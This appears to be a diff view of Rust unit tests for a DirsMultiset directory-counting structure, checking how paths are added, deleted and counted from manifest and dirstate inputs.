140 142 fn test_delete_path_path_not_found() {
141 143 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
142 144 let path = b"doesnotexist/";
143 145 assert_eq!(
144 146 Err(DirstateMapError::PathNotFound(path.to_vec())),
145 147 map.delete_path(path)
146 148 );
147 149 }
148 150
149 151 #[test]
150 152 fn test_delete_path_empty_path() {
151 153 let mut map =
152 154 DirsMultiset::new(DirsIterable::Manifest(vec![vec![]]), None);
153 155 let path = b"";
154 156 assert_eq!(Ok(()), map.delete_path(path));
155 157 assert_eq!(
156 158 Err(DirstateMapError::PathNotFound(path.to_vec())),
157 159 map.delete_path(path)
158 160 );
159 161 }
160 162
161 163 #[test]
162 164 fn test_delete_path_successful() {
163 165 let mut map = DirsMultiset {
164 166 inner: [("", 5), ("a", 3), ("a/b", 2), ("a/c", 1)]
165 167 .iter()
166 168 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
167 169 .collect(),
168 170 };
169 171
170 172 assert_eq!(Ok(()), map.delete_path(b"a/b/"));
171 173 assert_eq!(Ok(()), map.delete_path(b"a/b/"));
172 174 assert_eq!(
173 175 Err(DirstateMapError::PathNotFound(b"a/b/".to_vec())),
174 176 map.delete_path(b"a/b/")
175 177 );
176 178
177 179 assert_eq!(2, *map.get(&b"a".to_vec()).unwrap());
178 180 assert_eq!(1, *map.get(&b"a/c".to_vec()).unwrap());
179 181 eprintln!("{:?}", map);
180 182 assert_eq!(Ok(()), map.delete_path(b"a/"));
181 183 eprintln!("{:?}", map);
182 184
183 185 assert_eq!(Ok(()), map.delete_path(b"a/c/"));
184 186 assert_eq!(
185 187 Err(DirstateMapError::PathNotFound(b"a/c/".to_vec())),
186 188 map.delete_path(b"a/c/")
187 189 );
188 190 }
189 191
190 192 #[test]
191 193 fn test_add_path_empty_path() {
192 194 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
193 195 let path = b"";
194 196 map.add_path(path);
195 197
196 198 assert_eq!(1, map.len());
197 199 }
198 200
199 201 #[test]
200 202 fn test_add_path_successful() {
201 203 let mut map = DirsMultiset::new(DirsIterable::Manifest(vec![]), None);
202 204
203 205 map.add_path(b"a/");
204 206 assert_eq!(1, *map.get(&b"a".to_vec()).unwrap());
205 207 assert_eq!(1, *map.get(&Vec::new()).unwrap());
206 208 assert_eq!(2, map.len());
207 209
208 210 // A non-directory path should be ignored
209 211 map.add_path(b"a");
210 212 assert_eq!(1, *map.get(&b"a".to_vec()).unwrap());
211 213 assert_eq!(2, map.len());
212 214
213 215 // A non-directory path will still add its base
214 216 map.add_path(b"a/b");
215 217 assert_eq!(2, *map.get(&b"a".to_vec()).unwrap());
216 218 assert_eq!(2, map.len());
217 219
218 220 // Duplicate path works
219 221 map.add_path(b"a/");
220 222 assert_eq!(3, *map.get(&b"a".to_vec()).unwrap());
221 223
222 224 // Nested dir adds to its base
223 225 map.add_path(b"a/b/");
224 226 assert_eq!(4, *map.get(&b"a".to_vec()).unwrap());
225 227 assert_eq!(1, *map.get(&b"a/b".to_vec()).unwrap());
226 228
227 229 // but not its base's base, because it already existed
228 230 map.add_path(b"a/b/c/");
229 231 assert_eq!(4, *map.get(&b"a".to_vec()).unwrap());
230 232 assert_eq!(2, *map.get(&b"a/b".to_vec()).unwrap());
231 233
232 234 map.add_path(b"a/c/");
233 235 assert_eq!(1, *map.get(&b"a/c".to_vec()).unwrap());
234 236
235 237 let expected = DirsMultiset {
236 238 inner: [("", 2), ("a", 5), ("a/b", 2), ("a/b/c", 1), ("a/c", 1)]
237 239 .iter()
238 240 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
239 241 .collect(),
240 242 };
241 243 assert_eq!(map, expected);
242 244 }
243 245
244 246 #[test]
245 247 fn test_dirsmultiset_new_empty() {
246 248 use DirsIterable::{Dirstate, Manifest};
247 249
248 250 let new = DirsMultiset::new(Manifest(vec![]), None);
249 251 let expected = DirsMultiset {
250 252 inner: HashMap::new(),
251 253 };
252 254 assert_eq!(expected, new);
253 255
254 256 let new = DirsMultiset::new(Dirstate(vec![]), None);
255 257 let expected = DirsMultiset {
256 258 inner: HashMap::new(),
257 259 };
258 260 assert_eq!(expected, new);
259 261 }
260 262
261 263 #[test]
262 264 fn test_dirsmultiset_new_no_skip() {
263 265 use DirsIterable::{Dirstate, Manifest};
264 266
265 267 let input_vec = ["a/", "b/", "a/c", "a/d/"]
266 268 .iter()
267 269 .map(|e| e.as_bytes().to_vec())
268 270 .collect();
269 271 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
270 272 .iter()
271 273 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
272 274 .collect();
273 275
274 276 let new = DirsMultiset::new(Manifest(input_vec), None);
275 277 let expected = DirsMultiset {
276 278 inner: expected_inner,
277 279 };
278 280 assert_eq!(expected, new);
279 281
280 282 let input_map = ["a/", "b/", "a/c", "a/d/"]
281 283 .iter()
282 284 .map(|f| {
283 285 (
284 286 f.as_bytes().to_vec(),
285 287 DirstateEntry {
286 288 state: 0,
287 289 mode: 0,
288 290 mtime: 0,
289 291 size: 0,
290 292 },
291 293 )
292 294 })
293 295 .collect();
294 296 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
295 297 .iter()
296 298 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
297 299 .collect();
298 300
299 301 let new = DirsMultiset::new(Dirstate(input_map), None);
300 302 let expected = DirsMultiset {
301 303 inner: expected_inner,
302 304 };
303 305 assert_eq!(expected, new);
304 306 }
305 307
306 308 #[test]
307 309 fn test_dirsmultiset_new_skip() {
308 310 use DirsIterable::{Dirstate, Manifest};
309 311
310 312 let input_vec = ["a/", "b/", "a/c", "a/d/"]
311 313 .iter()
312 314 .map(|e| e.as_bytes().to_vec())
313 315 .collect();
314 316 let expected_inner = [("", 2), ("a", 3), ("b", 1), ("a/d", 1)]
315 317 .iter()
316 318 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
317 319 .collect();
318 320
319 321 let new = DirsMultiset::new(Manifest(input_vec), Some('n' as i8));
320 322 let expected = DirsMultiset {
321 323 inner: expected_inner,
322 324 };
323 325 // Skip does not affect a manifest
324 326 assert_eq!(expected, new);
325 327
326 328 let input_map =
327 329 [("a/", 'n'), ("a/b/", 'n'), ("a/c", 'r'), ("a/d/", 'm')]
328 330 .iter()
329 331 .map(|(f, state)| {
330 332 (
331 333 f.as_bytes().to_vec(),
332 334 DirstateEntry {
333 335 state: *state as i8,
334 336 mode: 0,
335 337 mtime: 0,
336 338 size: 0,
337 339 },
338 340 )
339 341 })
340 342 .collect();
341 343
342 344 // "a" incremented with "a/c" and "a/d/"
343 345 let expected_inner = [("", 1), ("a", 2), ("a/d", 1)]
344 346 .iter()
345 347 .map(|(k, v)| (k.as_bytes().to_vec(), *v))
346 348 .collect();
347 349
348 350 let new = DirsMultiset::new(Dirstate(input_map), Some('n' as i8));
349 351 let expected = DirsMultiset {
350 352 inner: expected_inner,
351 353 };
352 354 assert_eq!(expected, new);
353 355 }
354 356
355 357 }